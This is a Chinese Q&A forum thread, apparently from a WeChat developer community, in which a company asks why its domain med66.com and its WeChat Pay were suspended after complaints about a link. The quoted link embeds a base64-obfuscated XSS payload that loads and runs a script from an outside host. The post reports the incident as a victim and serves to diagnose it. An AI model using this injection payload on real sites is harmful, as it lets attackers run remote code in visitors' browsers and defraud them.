收藏
回答

域名被微封了,突然我们公司因为这个链接被投诉导致公司域名被封!

今天突然提示我们公司因为这个链接含有恶意欺诈内容、被多人投诉,已停止访问。

被投诉链接:http://member.med66.com/sale/product/courseList.shtm?courseEduId=901611234abce"?new Function(atob(`ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7di5zcmM9Ii8vZjUuZHVveGouY29tL3giO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQodik7dGhyb3cgMA==`))():"&cwareSubjectID=901807&U2FsdGVkX1zzdsgbfh2BXqtFDaGhXnaInqLAfyU7OqadWKPhOZquqzQzTdW3dsA1zzdsgbfh2BOQcTv4qjPEIRazFAszzdsgbfh2FajUCQNxbv8EkY7DVZPnV4dnWTGzZoYa1MxdsveGzzdsgbfh2FImrk8mhCWwgQ1h&money=17161#1589004617920

导致结果:公司微信支付暂停了2个小时,公司网站被微信封了2个小时,公司网站:http://www.med66.com/

疑惑:这个链接被多少个人投诉?不知道到底是什么原因导致的,想问一下!




回答关注问题邀请回答
收藏

2 个回答

  • 丶
    2020-12-23

    这种怎么预防 xss能不能预防这种

    2020-12-23
    有用
    回复
  • 小生蚝
    小生蚝
    2020-05-09

    有可能是后面那串JS代码触发了什么监测机制吧?申诉咯

    2020-05-09
    有用
    回复
登录 后发表内容
问题标签